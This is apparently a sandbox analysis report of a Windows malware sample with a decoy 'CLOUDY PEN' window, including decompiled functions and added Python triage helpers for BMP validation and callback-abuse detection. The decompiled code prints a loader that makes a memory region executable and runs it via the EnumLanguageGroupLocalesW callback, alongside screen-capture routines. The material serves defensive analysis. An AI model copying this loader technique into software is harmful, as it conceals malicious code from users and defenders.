                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: File$BitsWrite$CloseCreateHandleObjectRelease
                                              • String ID: (
                                              • API String ID: 1864849596-3887548279
                                              • Opcode ID: dfcf794a157387090c46c0472e9066e23338345ce97ba9ab190e104e255db132
                                              • Instruction ID: 99a353824dc3299d9dd34eefd8ceeed3b4ee44d0fb702dd5b19753f217b23ecc
                                              • Opcode Fuzzy Hash: dfcf794a157387090c46c0472e9066e23338345ce97ba9ab190e104e255db132
                                              • Instruction Fuzzy Hash: B46104B5E00208EBDB04CFD4D995BEEBBB5EF88700F108119E615BB294D775AA04CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%
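The APIs above, in this order, are the standard screen-to-.bmp capture: GetDC(NULL) is the screen DC, GetObjectW with cbBuffer 0x18 fills a BITMAP (24 bytes on x86), GetDIBits is called twice (header first, then pixels), the output file is opened with GENERIC_WRITE (0x40000000) and CREATE_ALWAYS (2), and the 14-byte WriteFile is a BITMAPFILEHEADER, followed by the DIB in the second WriteFile. For triage of a file dropped by such a routine, the following is an added example (not from the report, the sandbox or the sample) that parses and validates that layout: file header, BITMAPINFOHEADER, palette position, the 4-byte row stride and the top-down (negative biHeight) case, and it rejects truncated output such as a capture cut off during the second write. The sample files are constructed inline by build_bmp; nothing is read from disk.

```python
import struct
from dataclasses import dataclass, field

# Layouts from wingdi.h; both structures are little-endian and packed.
FILE_HDR = "<2sIHHI"        # BITMAPFILEHEADER: bfType, bfSize, bfReserved1, bfReserved2, bfOffBits
INFO_HDR = "<IiiHHIIiiII"   # BITMAPINFOHEADER: biSize, biWidth, biHeight, biPlanes, biBitCount,
                            #   biCompression, biSizeImage, biXPelsPerMeter, biYPelsPerMeter,
                            #   biClrUsed, biClrImportant
FILE_HDR_LEN = struct.calcsize(FILE_HDR)   # 14: the size of the first WriteFile in the listing
INFO_HDR_LEN = struct.calcsize(INFO_HDR)   # 40
BI_RGB = 0


@dataclass
class BmpInfo:
    width: int
    height: int
    top_down: bool
    bit_count: int
    compression: int
    stride: int          # bytes per pixel row, padded to a multiple of 4
    pixel_bytes: int
    off_bits: int
    warnings: list = field(default_factory=list)


def row_stride(width: int, bit_count: int) -> int:
    """DIB rows are padded to a multiple of 4 bytes."""
    return ((width * bit_count + 31) // 32) * 4


def parse_bmp(data: bytes) -> BmpInfo:
    """Validate a BITMAPFILEHEADER + BITMAPINFOHEADER file; raise ValueError if it is not a consistent BMP."""
    if len(data) < FILE_HDR_LEN + INFO_HDR_LEN:
        raise ValueError("shorter than BITMAPFILEHEADER + BITMAPINFOHEADER")
    magic, bf_size, _r1, _r2, off_bits = struct.unpack_from(FILE_HDR, data, 0)
    if magic != b"BM":
        raise ValueError("bad bfType %r" % magic)
    (bi_size, width, height, planes, bit_count, compression, size_image,
     _xppm, _yppm, clr_used, _clr_important) = struct.unpack_from(INFO_HDR, data, FILE_HDR_LEN)
    if bi_size < INFO_HDR_LEN:
        raise ValueError("DIB header too small: %d" % bi_size)
    if planes != 1 or bit_count not in (1, 4, 8, 16, 24, 32):
        raise ValueError("unsupported planes/bpp: %d/%d" % (planes, bit_count))
    if width <= 0 or height == 0:
        raise ValueError("bad dimensions %dx%d" % (width, height))
    # A negative biHeight means rows are stored top-down instead of the default bottom-up.
    top_down = height < 0
    stride = row_stride(width, bit_count)
    pixel_bytes = stride * abs(height)
    # For <= 8 bpp a palette of RGBQUAD entries sits between the DIB header and the pixels.
    palette_entries = (clr_used or (1 << bit_count)) if bit_count <= 8 else clr_used
    min_off = FILE_HDR_LEN + bi_size + 4 * palette_entries
    if off_bits < min_off:
        raise ValueError("bfOffBits %d overlaps headers/palette (need >= %d)" % (off_bits, min_off))
    if compression == BI_RGB:
        if off_bits + pixel_bytes > len(data):
            raise ValueError("pixel data runs past end of file")
        if size_image not in (0, pixel_bytes):
            raise ValueError("biSizeImage %d != computed %d" % (size_image, pixel_bytes))
    info = BmpInfo(width, abs(height), top_down, bit_count, compression, stride, pixel_bytes, off_bits)
    if bf_size != len(data):
        # Readable, but the writer's bfSize does not match: worth noting in a triage report.
        info.warnings.append("bfSize %d != file length %d" % (bf_size, len(data)))
    return info


def is_valid_bmp(data: bytes) -> bool:
    try:
        parse_bmp(data)
        return True
    except ValueError:
        return False


def build_bmp(width: int, height: int, bit_count: int = 24, top_down: bool = False) -> bytes:
    """Constructed sample in the two-part layout the routine writes: 14-byte file header, then the DIB."""
    stride = row_stride(width, bit_count)
    pixels = bytes((i * 37) & 0xFF for i in range(stride * height))   # constructed pixel data
    palette = b""
    if bit_count <= 8:
        palette = b"".join(struct.pack("<BBBB", i, i, i, 0) for i in range(1 << bit_count))
    off_bits = FILE_HDR_LEN + INFO_HDR_LEN + len(palette)
    info = struct.pack(INFO_HDR, INFO_HDR_LEN, width, -height if top_down else height, 1, bit_count,
                       BI_RGB, len(pixels), 2835, 2835, 0, 0)
    file_hdr = struct.pack(FILE_HDR, b"BM", off_bits + len(pixels), 0, 0, off_bits)
    return file_hdr + info + palette + pixels
```

Run parse_bmp over the dropped file's bytes: a ValueError means the data is not a consistent BMP (for instance the second WriteFile never completed), while entries in warnings are inconsistencies that do not stop the image from being rendered.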

                                              C-Code - Quality: 87%
                                              			E002FCC60(struct HINSTANCE__* _a4) {
                                              				long _v8;
                                              				struct tagMSG _v36;
                                              				struct _WNDCLASSW _v76;
                                              
                                              				/* Decoy GUI: a plain window class whose procedure is E002FCAB0. */
                                              				_v76.style = 0;
                                              				_v76.lpfnWndProc = 0;
                                              				_v76.cbClsExtra = 0;
                                              				_v76.cbWndExtra = 0;
                                              				_v76.hInstance = 0;
                                              				_v76.hIcon = 0;
                                              				_v76.hCursor = 0;
                                              				_v76.hbrBackground = 0;
                                              				_v76.lpszMenuName = 0;
                                              				_v76.lpszClassName = 0;
                                              				_v76.lpszClassName = 0x304a04;
                                              				_v76.hInstance = _a4;
                                              				_v76.hbrBackground = GetSysColorBrush(0xf); /* COLOR_BTNFACE */
                                              				_v76.lpfnWndProc = E002FCAB0;
                                              				_v76.hCursor = LoadCursorW(0, 0x7f00); /* IDC_ARROW */
                                              				RegisterClassW( &_v76);
                                              				E002FC320(_a4, 0x3059b0, 0x3059c4);
                                              				 *0x3059c0 =  *0x3059b0;
                                              				/* 0x28c bytes of the module at 0x304b90 (0x304b90..0x304e1b) are made PAGE_EXECUTE_READWRITE (0x40) ... */
                                              				VirtualProtect(0x304b90, 0x28c, 0x40,  &_v8);
                                              				/* ... and the same address is passed as lpLangGroupLocaleEnumProc: Windows invokes it for each
                                              				   locale of language group 2, so the bytes at 0x304b90 execute through an API callback rather
                                              				   than a direct call (no call/jmp to the region appears in this function). */
                                              				__imp__EnumLanguageGroupLocalesW(0x304b90, 2, 0, 0);
                                              				/* Only then does the visible window appear: style 0x10cf0000 = WS_OVERLAPPEDWINDOW | WS_VISIBLE. */
                                              				CreateWindowExW(0, _v76.lpszClassName, L"CLOUDY PEN: beta 0.0", 0x10cf0000, 0x64, 0x64, 0x15e, 0xfa, 0, 0, _a4, 0);
                                              				while(GetMessageW( &_v36, 0, 0, 0) != 0) {
                                              					TranslateMessage( &_v36);
                                              					DispatchMessageW( &_v36);
                                              				}
                                              				return _v36.wParam;
                                              			}

                                              Instruction addresses (one per decompiled statement): 0x002fcc66 0x002fcc6f 0x002fcc72 0x002fcc75 0x002fcc78 0x002fcc7b 0x002fcc7e 0x002fcc81 0x002fcc84 0x002fcc87 0x002fcc8a 0x002fcc94 0x002fcc9f 0x002fcca2 0x002fccb6 0x002fccbd 0x002fcccd 0x002fccd7 0x002fccec 0x002fccfd 0x002fcd2b 0x002fcd31 0x002fcd49 0x002fcd53 0x002fcd53 0x002fcd61

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 002FCC99
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 002FCCB0
                                              • RegisterClassW.USER32 ref: 002FCCBD
                                              • VirtualProtect.KERNEL32(00304B90,0000028C,00000040,?), ref: 002FCCEC
                                              • EnumLanguageGroupLocalesW.KERNEL32(00304B90,00000002,00000000,00000000), ref: 002FCCFD
                                              • CreateWindowExW.USER32 ref: 002FCD2B
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002FCD3B
                                              • TranslateMessage.USER32(?), ref: 002FCD49
                                              • DispatchMessageW.USER32 ref: 002FCD53
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Message$BrushClassColorCreateCursorDispatchEnumGroupLanguageLoadLocalesProtectRegisterTranslateVirtualWindow
                                              • String ID: CLOUDY PEN: beta 0.0
                                              • API String ID: 1824785041-196906049
                                              • Opcode ID: 38a1beb99710dcac6768da31e043867376f209c08b1f0fb9f33a4d3c4c138b3c
                                              • Instruction ID: 1bc684bc4ca9132823ae970a1d0781f421ec50fc9c7b4ef2174188eefc2bb246
                                              • Opcode Fuzzy Hash: 38a1beb99710dcac6768da31e043867376f209c08b1f0fb9f33a4d3c4c138b3c
                                              • Instruction Fuzzy Hash: 6131ECB0A41308AFEB51DFA4ED5AFEE7BB4AB08B50F104129F609BA2D0D7B05900CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%
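VirtualProtect(0x304b90, 0x28c, 0x40) immediately followed by EnumLanguageGroupLocalesW(0x304b90, ...) in the API list above is the tell for callback-based shellcode execution: the first parameter of EnumLanguageGroupLocalesW is the enumeration callback, so the API itself transfers control into the bytes that were just made executable, and no call or jump into that region has to appear in the sample's own code. The following triage check, an added example that is not part of the report, the sandbox or the sample, extracts exactly this pattern from API lines in the format shown above: it records every VirtualProtect range given a PAGE_EXECUTE* protection and flags any later callback-taking API whose function-pointer argument lands inside one. CALLBACK_PARAM is an illustrative subset of Win32 APIs with the index of their function-pointer parameter (an assumption to extend as needed); LISTING quotes the lines from this report, and BENIGN is a constructed negative case with made-up addresses.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Index of the function-pointer parameter for Win32 APIs that invoke caller-supplied code.
# Illustrative subset (assumption): extend with whatever callback APIs your corpus shows.
CALLBACK_PARAM = {
    "EnumLanguageGroupLocalesW": 0, "EnumLanguageGroupLocalesA": 0,
    "EnumSystemLanguageGroupsW": 0, "EnumSystemLocalesW": 0, "EnumUILanguagesW": 0,
    "EnumDateFormatsW": 0, "EnumTimeFormatsW": 0, "EnumCalendarInfoW": 0,
    "EnumWindows": 0, "EnumChildWindows": 1, "EnumThreadWindows": 1, "EnumDesktopWindows": 1,
    "EnumResourceTypesW": 1, "EnumPropsExW": 1,
    "EnumFontsW": 2, "EnumFontFamiliesExW": 2, "GrayStringW": 2,
    "CreateThread": 2, "CreateRemoteThread": 3, "QueueUserAPC": 0, "SetTimer": 3,
}
EXEC_PROTECT = {0x10, 0x20, 0x40, 0x80}   # PAGE_EXECUTE, _READ, _READWRITE, _WRITECOPY

# Matches report lines such as "VirtualProtect.KERNEL32(00304B90,0000028C,00000040,?), ref: 002FCCEC"
# and argument-less ones such as "RegisterClassW.USER32 ref: 002FCCBD".
CALL_RE = re.compile(
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


@dataclass
class Call:
    api: str
    args: List[Optional[int]]   # None where the report prints '?' (value unknown)
    ref: int                    # address of the call instruction


def parse_listing(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = CALL_RE.search(line)
        if not m:
            continue
        args = []
        for a in (m.group("args") or "").split(","):
            a = a.strip()
            if not a:
                continue
            try:
                args.append(int(a, 16))
            except ValueError:
                args.append(None)
        calls.append(Call(m.group("api"), args, int(m.group("ref"), 16)))
    return calls


def find_callback_abuse(calls: List[Call]) -> List[dict]:
    """Flag callback pointers that fall inside a range an earlier VirtualProtect made executable."""
    exec_regions = []   # (base, size, ref of the VirtualProtect call), in listing order
    findings = []
    for c in calls:
        if c.api == "VirtualProtect" and len(c.args) >= 3:
            base, size, prot = c.args[:3]
            if None not in (base, size, prot) and prot in EXEC_PROTECT:
                exec_regions.append((base, size, c.ref))
            continue
        idx = CALLBACK_PARAM.get(c.api)
        if idx is None or idx >= len(c.args) or c.args[idx] is None:
            continue
        target = c.args[idx]
        for base, size, vp_ref in exec_regions:
            if base <= target < base + size:
                findings.append({"api": c.api, "callback": target, "ref": c.ref,
                                 "region": (base, size), "protect_ref": vp_ref})
    return findings


# Quoted from the report's API list for E002FCC60.
LISTING = """
• GetSysColorBrush.USER32(0000000F), ref: 002FCC99
• LoadCursorW.USER32(00000000,00007F00), ref: 002FCCB0
• RegisterClassW.USER32 ref: 002FCCBD
• VirtualProtect.KERNEL32(00304B90,0000028C,00000040,?), ref: 002FCCEC
• EnumLanguageGroupLocalesW.KERNEL32(00304B90,00000002,00000000,00000000), ref: 002FCCFD
• CreateWindowExW.USER32 ref: 002FCD2B
"""

# Constructed negative case (addresses made up): PAGE_READWRITE (0x04), so the callback is not flagged.
BENIGN = """
• VirtualProtect.KERNEL32(00304B90,0000028C,00000004,?), ref: 00401000
• EnumWindows.USER32(00304B90,00000000), ref: 00401010
"""

if __name__ == "__main__":
    for hit in find_callback_abuse(parse_listing(LISTING)):
        print("%s at %08X calls into RWX region %08X+%X (VirtualProtect at %08X)" % (
            hit["api"], hit["ref"], hit["region"][0], hit["region"][1], hit["protect_ref"]))
```

The check is deliberately order-sensitive: a protection change listed after the callback call is not counted, and regions only become known from VirtualProtect lines whose address argument the report resolved (a '?' there yields nothing), which keeps the result free of guesses.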

                                              C-Code - Quality: 69%
                                              			E002F71BF(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                              				signed int _v8;
                                              				int _v12;
                                              				void* _v24;
                                              				signed int _t49;
                                              				signed int _t54;
                                              				int _t58;
                                              				signed int _t60;
                                              				short* _t62;
                                              				signed int _t66;
                                              				short* _t70;
                                              				int _t71;
                                              				int _t78;
                                              				short* _t81;
                                              				signed int _t87;
                                              				signed int _t90;
                                              				void* _t95;
                                              				void* _t96;
                                              				int _t98;
                                              				short* _t101;
                                              				int _t103;
                                              				signed int _t106;
                                              				short* _t107;
                                              				void* _t110;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_t49 =  *0x304018; // 0xbb40e64e: MSVC __security_cookie (the x86 default value), verified on return by E002F19D1
                                              				_v8 = _t49 ^ _t106;
                                              				_push(__esi);
                                              				_t103 = _a20;
                                              				if(_t103 > 0) {
                                              					_t78 = E002F795F(_a16, _t103);
                                              					_t110 = _t78 - _t103;
                                              					_t4 = _t78 + 1; // 0x1
                                              					_t103 = _t4;
                                              					if(_t110 >= 0) {
                                              						_t103 = _t78;
                                              					}
                                              				}
                                              				_t98 = _a32;
                                              				if(_t98 == 0) {
                                              					_t98 =  *( *_a4 + 8);
                                              					_a32 = _t98;
                                              				}
                                              				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                                              				_v12 = _t54;
                                              				if(_t54 == 0) {
                                              					L38:
                                              					return E002F19D1(_v8 ^ _t106);
                                              				} else {
                                              					_t95 = _t54 + _t54;
                                              					_t85 = _t95 + 8;
                                              					asm("sbb eax, eax");
                                              					if((_t95 + 0x00000008 & _t54) == 0) {
                                              						_t81 = 0;
                                              						__eflags = 0;
                                              						L14:
                                              						if(_t81 == 0) {
                                              							L36:
                                              							_t105 = 0;
                                              							L37:
                                              							E002F5CC8(_t81);
                                              							goto L38;
                                              						}
                                              						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                                              						_t121 = _t58;
                                              						if(_t58 == 0) {
                                              							goto L36;
                                              						}
                                              						_t100 = _v12;
                                              						_t60 = E002F527C(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                                              						_t105 = _t60;
                                              						if(_t105 == 0) {
                                              							goto L36;
                                              						}
                                              						if((_a12 & 0x00000400) == 0) {
                                              							_t96 = _t105 + _t105;
                                              							_t87 = _t96 + 8;
                                              							__eflags = _t96 - _t87;
                                              							asm("sbb eax, eax");
                                              							__eflags = _t87 & _t60;
                                              							if((_t87 & _t60) == 0) {
                                              								_t101 = 0;
                                              								__eflags = 0;
                                              								L30:
                                              								__eflags = _t101;
                                              								if(__eflags == 0) {
                                              									L35:
                                              									E002F5CC8(_t101);
                                              									goto L36;
                                              								}
                                              								_t62 = E002F527C(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                                              								__eflags = _t62;
                                              								if(_t62 == 0) {
                                              									goto L35;
                                              								}
                                              								_push(0);
                                              								_push(0);
                                              								__eflags = _a28;
                                              								if(_a28 != 0) {
                                              									_push(_a28);
                                              									_push(_a24);
                                              								} else {
                                              									_push(0);
                                              									_push(0);
                                              								}
                                              								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                                              								__eflags = _t105;
                                              								if(_t105 != 0) {
                                              									E002F5CC8(_t101);
                                              									goto L37;
                                              								} else {
                                              									goto L35;
                                              								}
                                              							}
                                              							_t90 = _t96 + 8;
                                              							__eflags = _t96 - _t90;
                                              							asm("sbb eax, eax");
                                              							_t66 = _t60 & _t90;
                                              							_t87 = _t96 + 8;
                                              							__eflags = _t66 - 0x400;
                                              							if(_t66 > 0x400) { /* _malloca: above the 1024-byte threshold the buffer comes from the heap */
                                              								__eflags = _t96 - _t87;
                                              								asm("sbb eax, eax");
                                              								_t101 = E002F3696(_t87, _t66 & _t87);
                                              								_pop(_t87);
                                              								__eflags = _t101;
                                              								if(_t101 == 0) {
                                              									goto L35;
                                              								}
                                              								 *_t101 = 0xdddd; /* _malloca heap marker, read back by __freea */
                                              								L28:
                                              								_t101 =  &(_t101[4]);
                                              								goto L30;
                                              							}
                                              							__eflags = _t96 - _t87;
                                              							asm("sbb eax, eax");
                                              							E002FA3A0();
                                              							_t101 = _t107;
                                              							__eflags = _t101;
                                              							if(_t101 == 0) {
                                              								goto L35;
                                              							}
                                              							 *_t101 = 0xcccc; /* _malloca stack marker (buffer from __alloca_probe_16) */
                                              							goto L28;
                                              						}
                                              						_t70 = _a28;
                                              						if(_t70 == 0) {
                                              							goto L37;
                                              						}
                                              						_t125 = _t105 - _t70;
                                              						if(_t105 > _t70) {
                                              							goto L36;
                                              						}
                                              						_t71 = E002F527C(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                                              						_t105 = _t71;
                                              						if(_t71 != 0) {
                                              							goto L37;
                                              						}
                                              						goto L36;
                                              					}
                                              					asm("sbb eax, eax");
                                              					_t72 = _t54 & _t95 + 0x00000008;
                                              					_t85 = _t95 + 8;
                                              					if((_t54 & _t95 + 0x00000008) > 0x400) { /* _malloca: above the 1024-byte threshold the buffer comes from the heap */
                                              						__eflags = _t95 - _t85;
                                              						asm("sbb eax, eax");
                                              						_t81 = E002F3696(_t85, _t72 & _t85);
                                              						_pop(_t85);
                                              						__eflags = _t81;
                                              						if(__eflags == 0) {
                                              							goto L36;
                                              						}
                                              						 *_t81 = 0xdddd; /* _malloca heap marker, read back by __freea */
                                              						L12:
                                              						_t81 =  &(_t81[4]);
                                              						goto L14;
                                              					}
                                              					asm("sbb eax, eax");
                                              					E002FA3A0();
                                              					_t81 = _t107;
                                              					if(_t81 == 0) {
                                              						goto L36;
                                              					}
                                              					 *_t81 = 0xcccc; /* _malloca stack marker (buffer from __alloca_probe_16) */
                                              					goto L12;
                                              				}
                                              			}

                                              Instruction addresses (one per decompiled statement; 0x00000000 marks lines with no instruction of their own, such as gotos, labels and closing braces):
                                              0x002f71c4 0x002f71c5 0x002f71c6 0x002f71cd 0x002f71d1 0x002f71d2 0x002f71d8 0x002f71de 0x002f71e4 0x002f71e7
                                              0x002f71e7 0x002f71ea 0x002f71ec 0x002f71ec 0x002f71ea 0x002f71ee 0x002f71f3 0x002f71fa 0x002f71fd 0x002f71fd
                                              0x002f7219 0x002f721f 0x002f7224 0x002f73b7 0x002f73ca 0x002f722a 0x002f722a 0x002f722d 0x002f7232 0x002f7236
                                              0x002f728a 0x002f728a 0x002f728c 0x002f728e 0x002f73ac 0x002f73ac 0x002f73ae 0x002f73af 0x00000000 0x002f73b5
                                              0x002f729f 0x002f72a5 0x002f72a7 0x00000000 0x00000000 0x002f72ad 0x002f72bf 0x002f72c4 0x002f72c8 0x00000000
                                              0x00000000 0x002f72d5 0x002f730f 0x002f7312 0x002f7315 0x002f7317 0x002f7319 0x002f731b 0x002f7367 0x002f7367
                                              0x002f7369 0x002f7369 0x002f736b 0x002f73a5 0x002f73a6 0x00000000 0x002f73ab 0x002f737f 0x002f7384 0x002f7386
                                              0x00000000 0x00000000 0x002f738a 0x002f738b 0x002f738c 0x002f738f 0x002f73cb 0x002f73ce 0x002f7391 0x002f7391
                                              0x002f7392 0x002f7392 0x002f739f 0x002f73a1 0x002f73a3 0x002f73d4 0x00000000 0x00000000 0x00000000 0x00000000
                                              0x002f73a3 0x002f731d 0x002f7320 0x002f7322 0x002f7324 0x002f7326 0x002f7329 0x002f732e 0x002f7349 0x002f734b
                                              0x002f7355 0x002f7357 0x002f7358 0x002f735a 0x00000000 0x00000000 0x002f735c 0x002f7362 0x002f7362 0x00000000
                                              0x002f7362 0x002f7330 0x002f7332 0x002f7336 0x002f733b 0x002f733d 0x002f733f 0x00000000 0x00000000 0x002f7341
                                              0x00000000 0x002f7341 0x002f72d7 0x002f72dc 0x00000000 0x00000000 0x002f72e2 0x002f72e4 0x00000000 0x00000000
                                              0x002f72fb 0x002f7300 0x002f7304 0x00000000 0x00000000 0x00000000 0x002f730a 0x002f723d 0x002f723f 0x002f7241
                                              0x002f7249 0x002f7268 0x002f726a 0x002f7274 0x002f7276 0x002f7277 0x002f7279 0x00000000 0x00000000 0x002f727f
                                              0x002f7285 0x002f7285 0x00000000 0x002f7285 0x002f724d 0x002f7251 0x002f7256 0x002f725a 0x00000000 0x00000000
                                              0x002f7260 0x00000000 0x002f7260

                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,002F7410,?,?,00000000), ref: 002F7219
                                              • __alloca_probe_16.LIBCMT ref: 002F7251
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,002F7410,?,?,00000000,?,?,?), ref: 002F729F
                                              • __alloca_probe_16.LIBCMT ref: 002F7336
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002F7399
                                              • __freea.LIBCMT ref: 002F73A6
                                                • Part of subcall function 002F3696: HeapAlloc.KERNEL32(00000000,?,00000004,?,002F381C,?,00000000,?,002F60CD,?,00000004,00000000,?,?,?,002F3361), ref: 002F36C8
                                              • __freea.LIBCMT ref: 002F73AF
                                              • __freea.LIBCMT ref: 002F73D4
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                              • String ID:
                                              • API String ID: 2597970681-0
                                              • Opcode ID: 79214484eb9c871ee3b9462c07cfabde08cd11e058c3817099d9c09b9cd44d3b
                                              • Instruction ID: 43bc0e9ba9128226248c9f989fd150a18c19126853d7f0b8dde60b7c5098216e
                                              • Opcode Fuzzy Hash: 79214484eb9c871ee3b9462c07cfabde08cd11e058c3817099d9c09b9cd44d3b
                                              • Instruction Fuzzy Hash: C851007262421FBBEB258E64CC42EBFB7AAEB44790B150279FE04D6150EB70DC609B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC0F0(int _a4, struct HWND__* _a8) {
                                              				long* _v8;
                                              				struct HDC__* _v12;
                                              				int _v16;
                                              				int _v20;
                                              				struct HBRUSH__* _v24;
                                              				void* _v28;
                                              				int _t41;
                                              
                                              				_t41 = _a4;
                                              				_v8 =  *_t41;
                                              				while(_v8 != 0) {
                                              					_v12 = GetDC(_a8);
                                              					_v20 = _v8[2];
                                              					_v16 = _v8[3];
                                              					if(_v20 < 0 || _v16 < 0) {
                                              						_v24 = CreateSolidBrush(_v8[1]);
                                              						_v28 = SelectObject(_v12, _v24);
                                              						ExtFloodFill(_v12,  *(_v8[4] + 8),  *(_v8[4] + 0xc),  *_v8, 1);
                                              						SelectObject(_v12, _v28);
                                              						return DeleteObject(_v12);
                                              					}
                                              					SetPixel(_v12, _v20, _v16, _v8[1]);
                                              					_v8 = _v8[4];
                                              					_t41 = ReleaseDC(_a8, _v12);
                                              				}
                                              				return _t41;
                                              			}

                                              Instruction addresses (one per source line, in order): 0x002fc0f6, 0x002fc0fb, 0x002fc0fe, 0x002fc112, 0x002fc11b, 0x002fc124, 0x002fc12b, 0x002fc15b, 0x002fc16c, 0x002fc18f, 0x002fc19d, 0x00000000, 0x002fc1a7, 0x002fc146, 0x002fc1b5, 0x002fc1c0, 0x002fc1c0, 0x002fc1ce

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Object$Select$BrushCreateDeleteFillFloodPixelReleaseSolid
                                              • String ID:
                                              • API String ID: 2019556567-0
                                              • Opcode ID: 9f0208953a36b982dc7ec73fddde9ff7b38050f52dc80a3b96da8e62fcaeee75
                                              • Instruction ID: 4c913f30251323b740b4c7693da2ffb3dedb81674b65a05090a9138130059aa1
                                              • Opcode Fuzzy Hash: 9f0208953a36b982dc7ec73fddde9ff7b38050f52dc80a3b96da8e62fcaeee75
                                              • Instruction Fuzzy Hash: 01318479A10208EFCB04DF98D988DAEF7B5BF88350F208598E909A7361C771AE51DF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC1E0(int _a4, struct HWND__* _a8) {
                                              				long* _v8;
                                              				struct HDC__* _v12;
                                              				int _v16;
                                              				int _v20;
                                              				struct HBRUSH__* _v24;
                                              				void* _v28;
                                              				int _t40;
                                              
                                              				_t40 = _a4;
                                              				_v8 =  *_t40;
                                              				while(_v8 != 0) {
                                              					_v12 = GetDC(_a8);
                                              					_v20 = _v8[2];
                                              					_v16 = _v8[3];
                                              					if(_v20 < 0 || _v16 < 0) {
                                              						_v24 = CreateSolidBrush( *_v8);
                                              						_v28 = SelectObject(_v12, _v24);
                                              						ExtFloodFill(_v12,  *(_v8[4] + 8),  *(_v8[4] + 0xc), _v8[1], 1);
                                              						SelectObject(_v12, _v28);
                                              						return DeleteObject(_v24);
                                              					}
                                              					SetPixel(_v12, _v20, _v16,  *_v8);
                                              					_v8 = _v8[4];
                                              					_t40 = ReleaseDC(_a8, _v12);
                                              				}
                                              				return _t40;
                                              			}

                                              Instruction addresses (one per source line, in order): 0x002fc1e6, 0x002fc1eb, 0x002fc1ee, 0x002fc202, 0x002fc20b, 0x002fc214, 0x002fc21b, 0x002fc249, 0x002fc25a, 0x002fc27e, 0x002fc28c, 0x00000000, 0x002fc296, 0x002fc235, 0x002fc2a4, 0x002fc2af, 0x002fc2af, 0x002fc2bd

                                              APIs
                                              • GetDC.USER32(?), ref: 002FC1FC
                                              • SetPixel.GDI32(?,00000000,00000000,00000000), ref: 002FC235
                                              • CreateSolidBrush.GDI32(?), ref: 002FC243
                                              • SelectObject.GDI32(?,?), ref: 002FC254
                                              • ExtFloodFill.GDI32(?,?,?,?,00000001), ref: 002FC27E
                                              • SelectObject.GDI32(?,?), ref: 002FC28C
                                              • DeleteObject.GDI32(?), ref: 002FC296
                                              • ReleaseDC.USER32 ref: 002FC2AF
                                              Memory Dump Source
